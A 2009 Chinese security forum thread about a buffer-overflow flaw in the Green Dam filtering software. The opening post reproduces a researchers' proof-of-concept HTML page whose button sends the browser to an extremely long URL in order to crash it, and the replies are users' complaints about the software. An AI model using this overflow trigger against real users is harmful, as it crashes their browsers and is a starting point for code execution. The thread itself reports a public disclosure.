微点交流论坛
» 游客:  注册 | 登录 | 帮助

 

作者:
标题: 绿坝被老外爆严重安全问题
点饭的百度空间
银牌会员




积分 2315
发帖 2236
注册 2007-11-30
#1  绿坝被老外爆严重安全问题

绿坝被老外爆严重安全问题,根据下面链接的描述,安装绿坝后只需要访问一个特定的URL就会被溢出执行恶意代码。

http://www.cse.umich.edu/~jhalderm/pub/gd/

PS:

被和谐的POC代码

--------我是和谐分割线---------------------------------------------------------------------

<html>
<head>
<title>Green Dam Vulnerability Demonstration</title>
</head>
<body>
<p>If you're running Green Dam, clicking this button should crash your browser or tab.</p>
<p>See our <a href="http://www.cse.umich.edu/~jhalderm/pub/gd/">report</a> for details about Green Dam security vulnerabilities.</p>
<center>
<input style="font-size:120%;" type="button" name="demo1" value="Crash Browser!" onclick="javascript:window.location='http://wolchok.org:8000/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.html'"></input>
</form></center>
</body>

※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint
2009-6-12 12:06
查看资料  发送邮件  访问主页  发短消息   编辑帖子
qq8752088
中级用户




积分 237
发帖 237
注册 2009-4-11
来自 揭阳
#2  

不安装就好     即使7月1号买电脑的朋友  知道破解的方法就是OK    这样的软件  占内存又多   堵网速   自身的漏洞又多     最终的命运还是和其他过滤软件的命运一样  被人们遗弃   
政府的钱又石沉大海

※ ※ ※ 本文纯属【qq8752088】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

  [size=5] 东方骄傲[/size] [size=4]→[/size] [b][size=8] Micropoint![/size][/b]
2009-6-12 12:46
查看资料  发送邮件  发短消息  QQ   编辑帖子
qdryxgg
银牌会员




积分 1754
发帖 1744
注册 2008-12-20
来自 齐鲁大地
#3  

这本身就是个有个人企图的骗局,工信局还真是脑残啊,他们还真不如把4170万转投微点搞研发。

※ ※ ※ 本文纯属【qdryxgg】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

瑞云祥电脑图像科技
2009-6-12 16:29
查看资料  发送邮件  发短消息  QQ   编辑帖子
mamsds
银牌会员




积分 1373
发帖 1360
注册 2008-3-15
来自 乌克兰
#4  

他们不是脑残,是想自己捞好处!!!
这种软件,我觉得健康上网专家(原飞腾反黄)做得最好.......
还知道阻止开冰刃,纯粹是简单HIPS嘛..........

※ ※ ※ 本文纯属【mamsds】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

Vi Veri Veniversum Vivus Vici.
2009-6-12 21:04
查看资料  发送邮件  发短消息  QQ   编辑帖子
yangliu2000
中级用户





积分 209
发帖 209
注册 2009-1-13
#5  

工信部真能推荐这样的软件?
估计上了被控制的网站, 就会出现问题.

※ ※ ※ 本文纯属【yangliu2000】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-6-24 08:00
查看资料  发送邮件  发短消息   编辑帖子
yiheyou
中级用户




积分 446
发帖 446
注册 2008-12-26
来自 成都
#6  

大爷们儿一个,我是绝对不会装这个东西的!!!

※ ※ ※ 本文纯属【yiheyou】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-6-24 11:13
查看资料  发送邮件  发短消息   编辑帖子
chinabigstar
注册用户





积分 60
发帖 60
注册 2009-3-18
#7  

呵呵,我没用过.

※ ※ ※ 本文纯属【chinabigstar】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-6-24 16:58
查看资料  发送邮件  发短消息   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]


北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号